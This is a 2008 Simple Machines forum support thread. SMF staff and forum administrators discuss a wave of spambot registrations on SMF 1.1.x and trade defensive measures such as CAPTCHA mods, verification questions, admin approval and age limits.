Simple Machines Community Forum

SMF Support => SMF 1.1.x Support => Topic started by: Deprecated on November 11, 2008, 06:26:59 PM

Title: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 11, 2008, 06:26:59 PM
In recent days there has been a huge surge in the numbers of spambots attacking SMF 1.1.x forums. Some have suggested that this is due to the recent SMF 1.1.7 security upgrade, but in fact the attacks are unrelated to the functional changes in SMF 1.1.7. This is supported by the fact that SMF 1.1.6 and earlier versions are also subject to the attacks. The attacks have nothing to do with the SMF 1.1.7 upgrade.

We at SMF believe that this is nothing more than a coincidental, large scale, coordinated attack, possibly orchestrated using the recently updated version of Xrumer (http://en.wikipedia.org/wiki/Xrumer) or a similar script or program used for spamming forums. Evidently one or more large bot herders have decided to exploit the market and has targeted their fleet towards spamming SMF forums. It is mere coincidence that this happened around the same time as the SMF 1.1.7 upgrade was released.


Why aren't SMF 2.0 forums being targeted?

Nobody knows, but we can speculate that it is due to SMF 2.0's improved functionality, or maybe there are minor differences between 1.1.x and 2.0 that confuse the bots. In either case if you are running 2.0 you should be on the watch for the attack spreading to SMF 2.0.


What can you do?

1.) Everybody should make sure that they are running the latest SMF 1.x or 2.x version. While the spam attacks are not related to security, you should take this occasion as a reminder to check out your security and make sure you have done everything you can to make your forum safe.

2.) At least for now SMF 2.0 has not been affected. The new version has improved spam defenses including the ability to ask any number of verification questions (what year is it? are you a bot?). Since most forums will pick different questions, these questions are very difficult for spambots to answer. If you have been considering upgrading to 2.0, now might be a good time to do so.

3.) Smaller forums may be able to switch from Member Activation to Member Approval and then may examine email addresses, IP addresses, etc. to decide which applications are human and which are spammers. This of course will result in more labor to operate your forum.

4.) You may decide to use post counts to restrict new members to posting a staging area, then give them full access only after they have shown they are human. The staging area can be easily swept of any spam debris.

5.) There are three modification packages that we believe can provide adequate defenses against spambots. I have verified that each of these packages is suitable for SMF 1.1.7. They are:


The last of the three replaces SMF's CAPTCHA system, but if you use one of the other mod packages make sure you have your CAPTCHA enabled. It won't hurt and it may help.


What won't work?

1.) Blaming it on SMF 1.1.7: As I explained above, the attacks are targeting all 1.1.x versions. It has nothing to do with the recent 1.1.7 release.

2.) Banning IP addresses: This is the Internet version of "Whack a Mole." They can create IP addresses and find proxies faster than you can ban them. This is useless in my opinion...

3.) Banning email addresses: Again, they can change them faster than you can ban them. I've never seen a human registration from mail.ru but some of the bots are using Gmail and other accounts. This is probably wasted effort unless you are manually verifying registrations.

4.) Hiding your SMF version: It's impossible for me to beleive that SMF 2.0 wasn't targeted only because the bots are searching for SMF 1.1.x strings. The target of SMF 2.0 would be too irrestible if there were not some other reason than the version tag.


Summary:

Well that's about it. My colleagues at SMF and I agree that there is no new problem with SMF's software, and that this is simply something that was going to eventually happen anyway. The only thing that changed is that some bot master tweaked and tuned his scripts for SMF 1.1.x. and so the attack has arrived this week.

Please take advantage of one or more of the steps that I've outlined above, and we believe that your spam attacks should stop. Be assured that if these measures don't work that either the developers or the mod package authors will come to your defense. Let's just all stay calm and collected, and one way or another we will beat the spambots. Unfortunately this will be an ongoing effort because each side is always going to be trying to upstage the other. Good luck!


EDIT: Added link to new mod: Anti-Spam Verification Questions (http://www.simplemachines.org/community/index.php?topic=276309.0)
Title: Re: Tidal wave of spambotbots attacks SMF 1.1.x - How to protect your forum
Post by: ccbtimewiz on November 11, 2008, 06:54:35 PM
Thanks for the info. :)
Title: Re: Tidal wave of spambotbots attacks SMF 1.1.x - How to protect your forum
Post by: ascaland on November 11, 2008, 07:44:50 PM
Very helpful. :D
Title: Re: Tidal wave of spambotbots attacks SMF 1.1.x - How to protect your forum
Post by: CloFan on November 11, 2008, 07:49:46 PM
Glad to see I'm not the only one affected.  Woke up this morning to lots of SPAM, and been clearing them out all day!  It got so bad I had to close registration for the time being.  Thanks for the info!
Title: Re: Tidal wave of spambotbots attacks SMF 1.1.x - How to protect your forum
Post by: TheDisturbedOne on November 11, 2008, 07:54:13 PM
I should keep "one eye open" now.  Wouldn't want my site to be ruined by them.
Title: Re: Tidal wave of spambotbots attacks SMF 1.1.x - How to protect your forum
Post by: NFG on November 11, 2008, 08:29:07 PM
I noticed the problem too and was very happy to see this post of fixes.  I've enabled two of 'em and expect the problem to cease PDQ.

Thank you.
Title: Re: Tidal wave of spambotbots attacks SMF 1.1.x - How to protect your forum
Post by: Mac_Hines on November 11, 2008, 08:58:20 PM
Timely advice!!!  Thanks!!!
Title: Re: Tidal wave of spambotbots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 11, 2008, 09:00:38 PM
The other topics were running away, speculative. This subject needed a cold shower. I gave it. :)
Title: Re: Tidal wave of spambotbots attacks SMF 1.1.x - How to protect your forum
Post by: papamitsos on November 11, 2008, 09:01:45 PM
Thanks for the info.

For me it just worked to change the complexity of visual verification image from medium to high.
Title: Re: Tidal wave of spambotbots attacks SMF 1.1.x - How to protect your forum
Post by: rogueplanet on November 11, 2008, 09:06:35 PM
i've just added the are-you-human to my install, has this been found to be most effective by most people?
Title: Re: Tidal wave of spambotbots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 11, 2008, 09:13:28 PM
We don't have any comparative reports of which mod works best yet. I suspect all work well unless we hear to the contrary. I think all you have to do is mess up the 'bots just slightly and their script will fail.

This topic welcomes comparative discussion on which is the best strategy to use. I've merely outlined the choices so that everybody can pick which works best for them.

Some of the mods are not yet rated by the authors as 1.1.7 compatible. Part of my work involved testing all three to make sure they work on 1.1.7. I didn't test them exhaustively, but they all install and remove and are able to register a new member with no error logs being generated. I tested for that.

BTW two of the mods are up for grabs if anybody wants to support them, karlbenson's mods. MC is still alive and well as of about 2 hours ago when I was chatting on him via IRC, so I think the reCAPTCHA mod is probably not up for grabs. ;)
Title: Re: Tidal wave of spambotbots attacks SMF 1.1.x - How to protect your forum
Post by: vbgamer45 on November 11, 2008, 09:15:19 PM
I noticed it on one of my forums as well. I will submit a mod to the modsite this weekend to help combat spam.
Title: Re: Tidal wave of spambotbots attacks SMF 1.1.x - How to protect your forum
Post by: dustrho on November 11, 2008, 09:17:13 PM
I just changed the registration setting to require admin approval, so that should surely stop these mo-fo's from spamming our forum. It's pretty easy to weed out the bots as their usernames and hostnames are all messed up looking, and most of these (in my forum at least) have their IPs showing up in non USA countries.
Title: Re: Tidal wave of spambotbots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 11, 2008, 09:17:59 PM
Great VB, I've been thinking along the same lines, but waiting to see if the spambots attack Beta 4 before I decide. :) I'll seeya where the mods play! ;)
Title: Re: Tidal wave of spambotbots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 11, 2008, 09:19:14 PM
Quote from: dustrho on November 11, 2008, 09:17:13 PM
I just changed the registration setting to require admin approval...

That is one of the strategies that I recommended in the OP, if your forum isn't so big that approval becomes an onerous task.
Title: Re: Tidal wave of spambotbots attacks SMF 1.1.x - How to protect your forum
Post by: hurtdidit on November 11, 2008, 09:22:49 PM
Thanks for the post.  I wasn't even aware of the reCAPTCHA mod, and am happy to implement it as it benefits a good cause.

Will be sure to let folks know if this doesn't help. :)
Title: Re: Tidal wave of spambotbots attacks SMF 1.1.x - How to protect your forum
Post by: lax.slash on November 11, 2008, 09:28:32 PM
/me knocks on wood


Haven't been hit yet on 2.0, or 1.1.5 (KEEP FORGETTING TO UPGRADE!!) but will definatly take these precautions. Thanks, Deprecated! :) :) :)
Title: Re: Tidal wave of spambotbots attacks SMF 1.1.x - How to protect your forum
Post by: 青山 素子 on November 11, 2008, 10:07:27 PM
As a note, reCAPTCHA for SMF works very well on the 2.0 betas, and in fact is much cleaner in code (because of the structure changes).
Title: Re: Tidal wave of spambotbots attacks SMF 1.1.x - How to protect your forum
Post by: rebelsgirl on November 11, 2008, 10:08:32 PM
I am using 1.1.7 and *touch wood* haven't had a problem with the spam bots yet.
Title: Re: Tidal wave of spambotbots attacks SMF 1.1.x - How to protect your forum
Post by: mouse92im on November 11, 2008, 10:13:07 PM
Adding an age restriction seems to have helped as well.  I haven't seen any new member requests since. 
Title: Re: Tidal wave of spambotbots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 11, 2008, 10:16:11 PM
Quote from: Motoko-chan on November 11, 2008, 10:07:27 PM
As a note, reCAPTCHA for SMF works very well on the 2.0 betas, and in fact is much cleaner in code (because of the structure changes).

I haven't addressed SMF 2.0 yet because as far as I know the spammerz haven't hit 2.0 yet, but if they do, MC's reCAPTCHA mod looks like the ultimate weapon against them. The other two mods rely on obscurity, but the reCAPTCHA relies on strong technology to replace SMF's CAPTCHA with a more robust CAPTCHA.

Make no mistake, if the spambots start hitting my 2.0 forums I'm heading for the reCAPTCHA download first. I don't believe in playing games with antagonists. Pull a knife on me and I'll shoot you through the heart. I believe MC's mod is good enough to be the equivalent.

Just for the record, MC's mod brought reCAPTCHA's technology to SMF. Visit their website: http://recaptcha.net/ (http://recaptcha.net/)
Title: Re: Tidal wave of spambotbots attacks SMF 1.1.x - How to protect your forum
Post by: 青山 素子 on November 11, 2008, 10:20:58 PM
Quote from: Deprecated on November 11, 2008, 10:16:11 PM
I haven't addressed SMF 2.0 yet because as far as I know the spammerz haven't hit 2.0 yet, but if they do, MC's reCAPTCHA mod looks like the ultimate weapon against them. The other two mods rely on obscurity, but the reCAPTCHA relies on strong technology to replace SMF's CAPTCHA with a more robust CAPTCHA.

Don't forget that 2.0 now adds registration questions. These should work just as well (and no mod install needed!).
Title: Re: Tidal wave of spambotbots attacks SMF 1.1.x - How to protect your forum
Post by: saratogaWX on November 11, 2008, 10:25:47 PM
I found the reCAPTCHA replacement for the built-in CAPTCHA works .. already got a thwarted registration attempt (from Saudi Arabia).   SMF 1.1.6 and SMF 1.1.7 . Thanks for the excellent information and advice.
Title: Re: Tidal wave of spambotbots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 11, 2008, 10:26:12 PM
Quote from: Motoko-chan on November 11, 2008, 10:20:58 PMDon't forget that 2.0 now adds registration questions. These should work just as well (and no mod install needed!).

Yes I noted the registration questions in my OP, and I'm already using them in my guest posting areas for my 2.0 forums.

What year is it? (2008)

Are you a bot? (no)

You could add as many questions as you like here, and the custom questions I'm sure really mess up the spambots!

Another great reason to upgrade to SMF 2.0.

Actually I'm considering a mod package to bring those questions to 1.1.x if the spambots can't be handled by the methods outlined in the OP.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Muldoon on November 11, 2008, 11:29:24 PM
Do you just recommended completely deleting these accounts, rather than any type of banning then? I've banned 13 accounts so far this evening...
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: 青山 素子 on November 11, 2008, 11:30:09 PM
Banning won't help too much against  botnets. Just delete and take the measures in the first post.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: catfished on November 11, 2008, 11:30:55 PM
After setting the image verification to high and adding an age limit, the attack has ceased on all my forums so far. Crossing my fingers.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Muldoon on November 11, 2008, 11:32:22 PM
Thanks Motoko-chan.  I'll delete them all and look at installing these mods.  I have never used them before...  Will there be issues with TinyPortal then?

Thank you,
Muldoon
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: ascaland on November 11, 2008, 11:34:05 PM
If it's the MODs for registering, then definately not. :)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Muldoon on November 11, 2008, 11:35:13 PM
Thanks!
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 11, 2008, 11:36:31 PM
Quote from: catfished on November 11, 2008, 11:30:55 PM
After setting the image verification to high and adding an age limit, the attack has ceased on all my forums so far. Crossing my fingers.

I'm glad our advice is working for you Catfished. :) Again I'm sorry for the misunderstanding in your other topic, and I hope we have made it up to you. :)

Trust me on this, we will support this problem until spammers cannot bother you. Our forum software won't work for anybody if we can't keep spambots out. It won't even work for my sites, so I have an iron in the fire too! :)

If nobody else, we mod authors will marshal our forces and kill the spambots. We have our heartland to protect! :)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 11, 2008, 11:39:07 PM
Quote from: Muldoon on November 11, 2008, 11:32:22 PM
Thanks Motoko-chan.  I'll delete them all and look at installing these mods.  I have never used them before...  Will there be issues with TinyPortal then?

Please report what worked for you and your TP installation. We need user reports of what works particularly in situations I couldn't test due to my not running any TP or any 1.1.7 production forums.

If you have a combo that works with TP we'd like to hear it.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Muldoon on November 11, 2008, 11:51:18 PM
I'm rather new to registration mods, or any mod for that matter.  I'm still running SMF 1.1.6 and TP 0.9.8

So I will report back when I successfully install these mods... 

and I take it you recommend maintenance mode for these mod installs...?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Muldoon on November 11, 2008, 11:57:51 PM
I'm seeing a lot of unactivated accounts with the last part of the hostname:

keymachine.de

some of the email addresses are .ru others are gmail...

I did delete all who posted this spam, but what to do about other accounts that maybe are spammers but never activated...
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 12, 2008, 12:07:15 AM
Muldoon, please tell us which of those accounts were from after you installed at least one of the mods in the OP, or tell us what other measures that you tried and found that they failed.

The important thing in this topic is that you should try at least one method outlined in the OP, and then report back whether it succeeded or failed.


And as to your other question: Well... if all else fails, just delete anybody you aren't sure about, and hope if they are real people they will try again.

Or email them and ask them about their registration. How many bots reply to questions via email? (Maybe a few, but this should help you.)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Muldoon on November 12, 2008, 12:21:55 AM
Just came across this.  Hope this helps:

http://www.stopforumspam.com/

I'm using this to locate them in my members list
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 12, 2008, 12:25:15 AM
Interesting site for manual look-ups. Unfortunately for all but the smallest forums that is impractical. However, they have an API (applications interface: computer compatible) so it might be possible for some mod author to create an SMF mod package to use the service.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: metallica48423 on November 12, 2008, 01:02:20 AM
I'd also like to point out that theres also, seemingly, been other coordinated attacks today.  For a short while today World of Warcraft's servers were almost completely inundated with traffic from a DoS attack.  A number of people in the hosting industry today informed me of DoS attacks going on against their datacenters.  For a short while we were also seeing odd requests on this forum happening. 

The best advice I can give administrators is to keep an eye on things.  Don't be afraid to ask questions though if you need help getting things cleaned up. 

Thanks for everyone's patience :)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Muldoon on November 12, 2008, 02:17:12 AM
Well I turned on manual approval by me.  Sure enough, I verified info on the above site that I had just posted and both were bad accounts.  Well one was on the site, and another's last two digits in the IP were one number off, so deleted as well...
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: vagrant on November 12, 2008, 02:46:03 AM
I found a big list of forum spammers, but it is a comma-separated IP list.
I don't know if it is of much use here as it's meant for another type of forum, and not sure if it can be imported into SMF ban system.

With the right "search and replace" on the comma's it could be used in an htaccess file i suppose.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: nzmacro on November 12, 2008, 02:49:17 AM
Driven me nuts as well. I've also turned on activated only by admin for the meantime.

Although this is probably not the right way, but its worked for me. I've banned from the server IP's  192.000.00.00 - 199.000.00.00 That seems to have stopped them altogether. Maybe its just a me thing, but its worked so far. Then again, we are a localised forum for Australasia, so nothing in between those interests us.

All the best and only for what works for us so far. That will probably change. ;)

Danny. 
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Edi3 on November 12, 2008, 03:41:51 AM
I run two forums.

One is still version SMF 1.1.4 while other is SMF 1.1.6.

I also have spam problem in last few days on both of them, but noticed that it is much harder for bots to post on 1.1.6  version than at 1.1.4. as lot of attempt fail.

I noticed same username trying on both forums, but only succeed on 1.1.4 to eventually post while not successful at 1.1.6
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: dvk01 on November 12, 2008, 04:14:29 AM
recaptcha only works on registration & not on guest postings

I need to allow guest postings on several of my forums, can recapture mod be amended to include the guest posting options  please

using 1.1.7
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Eddy Matthews on November 12, 2008, 04:17:20 AM
I was having the same problem with lots of spam accounts - I use SMF 1.1.7. Admin approval was set, so although they could register, they couldn't do anything else...  Visual verification was set to medium, and that had no effect - I increased that to high and it helped a little, but still didn't stop them.

This morning I added the Anti-bot registration puzzles, and so far (just over 2 hours) no more spam registrations! :)

My sincere thanks to everyone that has taken the time to try and defeat these idiots!

Regards
Eddy
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Golfoscarbravo on November 12, 2008, 07:14:00 AM
WOW, I started this topic and have been really impressed with the speed of which it has been answered. I have been banning them but have now added the top two options to registration. Can I add the third as well ? Or will they all conflict?

Now just got to see if it works !

Thanks everyone
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Edi3 on November 12, 2008, 07:21:37 AM
Quote from: catfished on November 11, 2008, 11:30:55 PM
After setting the image verification to high and adding an age limit, the attack has ceased on all my forums so far. Crossing my fingers.
I did the same on both of my forums and noticed since then , the attacks has completely ceased so far..
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Crasy on November 12, 2008, 07:37:50 AM
Quote from: nzmacro on November 12, 2008, 02:49:17 AM
Driven me nuts as well. I've also turned on activated only by admin for the meantime.

Although this is probably not the right way, but its worked for me. I've banned from the server IP's  192.000.00.00 - 199.000.00.00 That seems to have stopped them altogether. Maybe its just a me thing, but its worked so far. Then again, we are a localised forum for Australasia, so nothing in between those interests us.

All the best and only for what works for us so far. That will probably change. ;)

Danny.

I have had a friend report to me that most of the IP's she was seeing were sitting in the 192.x.x.x range. She was willing to ban the IP in a masssive generalized ban on her forums...just because he forums are small.

But I wouldn't recommend leaving such a generalized ban on your forums. Try out the methods shown here to stop bots from registering instead...rather than just banning.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Bill.Ramby on November 12, 2008, 08:05:17 AM
SMF 1.1.7 / TP 0.9.8 the human Mod is working to keep the spambots out. My logs are full of failed registrations.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: humbleworld on November 12, 2008, 08:20:05 AM
Three of my SMF sites were attacked yesterday and today. I have disabled all registration forms. I thought it was just me that got the problem. Thanks for the post. At least I know what to do now.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Costa on November 12, 2008, 09:06:13 AM
Deprecated

Do you authorized me to translate your first post?
That's very usefull information for people who don't understand english.

Farewell
- Costa
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 12, 2008, 09:08:15 AM
I believe we are focusing mainly on the solutions presented in the OP. I think for most cases it would take too much work to verify members manually, unless you have but a very small forum.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Final60 on November 12, 2008, 09:11:33 AM
Just wanted to add that I got the attacks at the same time on a 1.1.6 forum and a 1.1.7 forum. Have since added the "Are you human" mod. I personally have experienced nill new bot account creations.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: rogueplanet on November 12, 2008, 09:55:14 AM
well, i'm impressed, after getting spammed all yesterday, i added the Are-you-human mod and it seems to have stopped them in its tracks :)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: cschelin on November 12, 2008, 10:05:19 AM
SMF 1.1.6 (upgrading Saturday).

Installed the "Are You Human" mod.
Increased the complexity of the captcha
Switched to Admin Approval

I started doing the "staging area" modifications but realized that it would force all new users to post in the staging area so I'm thinking about it before finishing that up.

I do note that I've had 8 blocks since I made the changes yesterday morning so it seems to be helping.

Carl
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: JohnS on November 12, 2008, 10:08:10 AM
I can confirm that putting up the Captcha level to the highest seems to stop them , I am using 1.1.6. I was getting about 10 an hour in two boards, all seeming to originate in Netherlands or Saudi Arabia. Currently getting none, but am on approved membership just to be safe. When approving request confirmation just in case.
Even before I tackled this, some got in, but seem only to be putting content in the sign up profile, I have had no spam entries.
Will look at some of the other options but on first glance seemed too complicated for my head :D
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: catfished on November 12, 2008, 10:51:05 AM
Quote from: Deprecated on November 11, 2008, 11:36:31 PM
Quote from: catfished on November 11, 2008, 11:30:55 PM
After setting the image verification to high and adding an age limit, the attack has ceased on all my forums so far. Crossing my fingers.

I'm glad our advice is working for you Catfished. :) Again I'm sorry for the misunderstanding in your other topic, and I hope we have made it up to you. :)


No problem Deprecated, I now understand what was meant by "solved" in this case.

All my forums have been spam free since I implemented the above two fixes yesterday.
(http://catfished.com/emoticons/clap.gif)

I do realize this is not the end but at least we won this round.(http://catfished.com/emoticons/fudd.gif)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: 青山 素子 on November 12, 2008, 10:54:29 AM
Quote from: vagrant on November 12, 2008, 02:46:03 AM
I found a big list of forum spammers, but it is a comma-separated IP list.
I don't know if it is of much use here as it's meant for another type of forum, and not sure if it can be imported into SMF ban system.

As was said above, unless this is a directed attack from certain IPs, an IP block is pointless. Spammers have a lot of practice in getting around blocks by finding new proxies or creating them (there are a few tens of million Windows machines compromised that can be used). At best, it's worthless. At worst, you're blocking innocent people/visitors who happened to get assigned the "spammer" IP because they use the same ISP.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: vertese on November 12, 2008, 10:55:35 AM
Thank you very much for all you do.
It is most helpful, we appreciate the work you do for us.
Vertese
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 12, 2008, 11:00:20 AM
I'm glad we fixed you up Catfish. :) If you have any new problems just come on back and we'll find another way to fix you up.

I really hate two things: hackers and spammers. I'll go out of my way to thwart them, write some code if necessary. They may be clever, but we're clever too, and anything they throw at us we can throw right back in their faces. It's just that we have to understand what is happening before we know how to retaliate.

That topic yesterday, that was just trying to get the true picture of what was actually happening. Today the problem is solved, as summarized in the OP. Now all we have to do is (1) point people to this topic if they are being attacked by spammers, and (2) be ready for the next time the spammers improve their scripts. They will, and then we'll go through this all over again.

The important thing is that everybody should remain calm next time there is a spam attack. Report it at SMF and between the Support Team, developers and mod package authors, we'll find a way to terminate the spammers in their tracks. :)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: ErinMac on November 12, 2008, 11:32:34 AM
Quote from: catfished on November 11, 2008, 11:30:55 PM
After setting the image verification to high and adding an age limit, the attack has ceased on all my forums so far. Crossing my fingers.

This has worked on my 1.1.7 site as well - I'm sure it's short lived as it's just a minor tweak to their bot scripts - but it keeps me from having to install mods right off the bat.  If something changes, I'll be installing reCAPTCHA.

By the way, my error logs do show them coming back today - and the IP bans that I had put in before seeing this thread have been triggered multiple times.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: forumite on November 12, 2008, 11:38:45 AM
FWIW several non-SMF forums I visit have been hit hard with spam the last couple of days. One of them had hard core porn images in the body of a message. I disabled the ability to post inline images in our forum a long time ago.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: glasschalice on November 12, 2008, 11:47:03 AM
This might be a dumb question... should we install all three of the mods in the OP or just one?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 12, 2008, 11:56:35 AM
No questions are dumb questions if you don't know the answers.

I didn't test the mods together, only singly. However, at the present time I see no need for more than one mod as long as it works. Assuming default theme (the only thing I tested), the two mods by karlbenson are the easiest to install and I suggest you try one of them first. The reCAPTCHA is the most difficult to install and requires a free account at the reCAPTCHA site so it takes a few more steps to set up, but it is the most robust of the three.

My advice is that if you want to fix things quickly and don't mind an interim solution, install one of the karlbenson mods (the puzzles or Are You Human?). If you want a robust solution that is likely to hold for quite some time, install MC's reCAPTCHA modification.

It is quite possible that one of the simple mods might hold them off for a very long time. It depends on how determined the bot masters are, and how many SMF forums adopt those mods. But no, I would not install all three mods. That's overkill at the present time.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: glasschalice on November 12, 2008, 11:59:37 AM
Thank you!  I've installed the reCAPTCHA mod and signed up for one of their accounts.  I've also changed the age restriction and hopefully the two will weed out these creeps!

Thank you so much for all that you guys 'n gals do!  The dedication and support here are the best bar none and it is certainly appreciated!
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: palofdru on November 12, 2008, 12:06:04 PM
Quote from: Muldoon on November 11, 2008, 11:29:24 PM
Do you just recommended completely deleting these accounts, rather than any type of banning then? I've banned 13 accounts so far this evening...

I agree with what Moto said in response, but there is a benefit to banning these spam accounts.
- you know have a record in the database. If their technology improves (or they start using humans as captha busters) the attempts will be recognized and will fail.

If google Chrome gets wide acceptance, we will no doubt see a plethora of creative attacks, as the faster Javascript engine will allow naughty sites to do a lot more under the hood (that would previously be noticed as a slowdown or dragging performance)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: JohnS on November 12, 2008, 12:10:46 PM
Update - after tests the age limit is not fooling them, but putting the capcha to high is, at least for the moment, if that gets broken I will look at one of the other methods but as I am using several special themes it will take quite a while to implement that.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: breen on November 12, 2008, 12:11:24 PM
Hopefully this might help a few people finding the source of the attacks, I just added my site to digg.com and within seconds I had a tidal wave of spam bots.  I buried the digg article and the attacks instantly stopped.  Could be coincidence, but I thought I'd share my experience in case it helps someone out. 
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: forumite on November 12, 2008, 12:12:10 PM
Related question - if I change the required strength for user passwords (on the Admin|Registration page in SMF 1.1.7), does that only affect new registrations? i.e. will current members still be able to use their existing passwords?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Blind Bandit on November 12, 2008, 12:15:03 PM
Quote from: metallica48423 on November 12, 2008, 01:02:20 AM
I'd also like to point out that theres also, seemingly, been other coordinated attacks today.  For a short while today World of Warcraft's servers were almost completely inundated with traffic from a DoS attack.  A number of people in the hosting industry today informed me of DoS attacks going on against their datacenters.  For a short while we were also seeing odd requests on this forum happening. 

The best advice I can give administrators is to keep an eye on things.  Don't be afraid to ask questions though if you need help getting things cleaned up. 

Thanks for everyone's patience :)

Ya I can believe it, it seems Proboards has been the victim of at least 2 DoS attacks in the last few weeks.  One happened on the Ninth.


Quote from: breen on November 12, 2008, 12:11:24 PM
Hopefully this might help a few people finding the source of the attacks, I just added my site to digg.com and within seconds I had a tidal wave of spam bots.  I buried the digg article and the attacks instantly stopped.  Could be coincidence, but I thought I'd share my experience in case it helps someone out.

It could simply be the spambots are just really active right now.

Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: palofdru on November 12, 2008, 12:16:05 PM
Quote from: breen on November 12, 2008, 12:11:24 PM
Hopefully this might help a few people finding the source of the attacks, I just added my site to digg.com and within seconds I had a tidal wave of spam bots.  I buried the digg article and the attacks instantly stopped.  Could be coincidence, but I thought I'd share my experience in case it helps someone out.

:( not remotely helpful. What is happening is, the spammers are directing their efforts on popular sites. Obviously, making your site LESS popular to avoid spammers, is only one step away from  shutting it down altogether. (this also keeps out spam)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: 青山 素子 on November 12, 2008, 12:35:17 PM
Quote from: dvk01 on November 12, 2008, 04:14:29 AM
I need to allow guest postings on several of my forums, can recapture mod be amended to include the guest posting options  please

using 1.1.7

Use the Visual Verification Options (http://custom.simplemachines.org/mods/index.php?mod=734) modification. It only shows the built-in verification (sorry, I haven't written a "bridge" mod to combine the two), but should stop most spam guest posts.


Quote from: rvforumite on November 12, 2008, 12:12:10 PM
Related question - if I change the required strength for user passwords (on the Admin|Registration page in SMF 1.1.7), does that only affect new registrations? i.e. will current members still be able to use their existing passwords?

It will affect new registrations and any password changes. If an existing user tries to change their password, they will be subject to the new strength requirements.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: peterinwa on November 12, 2008, 12:50:25 PM
Thanks for the info. I thought I had just achieved enough status that my little forum had become spambotworthy!

I DO have a very small forum, and I chose to simply disable the registration process; I will register people by hand.

But when I disabled it in the Admin panel, it caused the registration link to produce an error message. I thought about modifying code to remove the registration links, but then I thought visitors would get frustrated looking for them.

So I chose to change the messages:

http://www.simplemachines.org/community/index.php?topic=273663.0

My registration links now take you to text that tell you to click on Home, then my Instructions board, where it tells you how to register (send me an e-mail).

It's working great!

Peter
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: farzad on November 12, 2008, 12:58:07 PM
reCAPTCHA worked for me - medium of the built in did not.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Paul Cull on November 12, 2008, 01:25:53 PM
I, too, found that the attack started yesterday, when I was still running 1.1.16. Have since upgraded to 1.1.17, added an age limit, and have been blocking the IP addresses of the attackers.. looking in the logs, I can see that this has stopped repeat visits.

As I am running a board in Brazilian Portuguese, aimed at Brazilian users, I don't mind blocking the other countries from which the attacks are originating.

